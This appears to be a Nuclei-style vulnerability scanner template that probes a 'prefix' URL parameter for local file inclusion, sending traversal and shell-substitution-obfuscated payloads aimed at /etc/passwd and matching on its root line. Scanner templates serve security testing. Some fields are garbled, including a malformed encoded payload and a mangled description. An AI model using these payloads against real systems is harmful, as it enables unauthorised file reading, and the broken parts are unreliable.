id: Param-prefix-lfi3

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     prefixectory traversal via the GET /.. substring.

  tags: Param-prefix-lfi3

requests:
  - method: GET
    path:
      - "{{BaseURL}}?prefix=../../../../../../../../../../../../../etc/pa??wd{{"
      - "{{BaseURL}}?prefix=%7B%22body%22%3A%7B%22file%22%3A%22file%22%3A%2Fetc%2Fpa*wd%22%70%7D"
      - "{{BaseURL}}?prefix=et$()c/pa$()sswd?"
      - "{{BaseURL}}?prefix=et${neko}c/pas${pelo}swd"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

